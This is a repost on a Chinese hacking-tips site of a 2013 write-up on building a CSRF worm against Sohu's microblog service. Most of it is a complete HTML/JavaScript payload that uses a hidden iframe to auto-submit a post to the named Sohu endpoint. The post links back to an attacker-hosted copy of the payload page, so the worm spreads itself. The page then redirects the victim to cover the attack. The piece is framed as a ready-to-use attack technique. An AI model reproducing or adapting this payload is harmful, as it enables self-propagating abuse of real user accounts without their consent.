记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜狐CSRF实例一:让蠕虫来得更猛烈些

2013-10-14 11:50
我们这次来看看如何利用纯CSRF来实现蠕虫攻击。
问题URL: http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 可CSRF发微博。下面来看看怎么利用 
通过上面的URL我构造了一个payload ,打开后先POST一条微博,然后等5秒跳转到指定地址。
 

<meta http-equiv="content-type" content="text/html;charset=utf-8">
<h1>正在跳转...</h1>
<iframe id="test_iframe" src="http://www.tianya.cn/82776194" style='display:none'>
</iframe>
<script>
function CSRF()
{
test_iframe.document.write("<form id='test_form' action='http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8' method='post' >"
+"<input type='hidden' name='content' value='荐一个好东西 http://cnhk.ml/souhu/send.html'>"
+"<input type='hidden' name='type' value='0'>"
+"<input type='hidden' name='from' value='sentence'>"
+"<input type='hidden' name='url' value=''>"
+"</form>"
+"<script>document.getElementById('test_form').submit();<\/script>"
);
}
CSRF();
window.setTimeout("window.location.href='http://threejs.org/'", 5000); //延迟5秒后跳转到指定网页
</script>

 

POST的内容为
荐一个好东西 http://cnhk.ml/souhu/send.html
 
这样就构成了一个CSRF蠕虫
 
知识来源: www.2cto.com/Article/201310/249566.html

阅读:63151 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狐CSRF实例一:让蠕虫来得更猛烈些”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云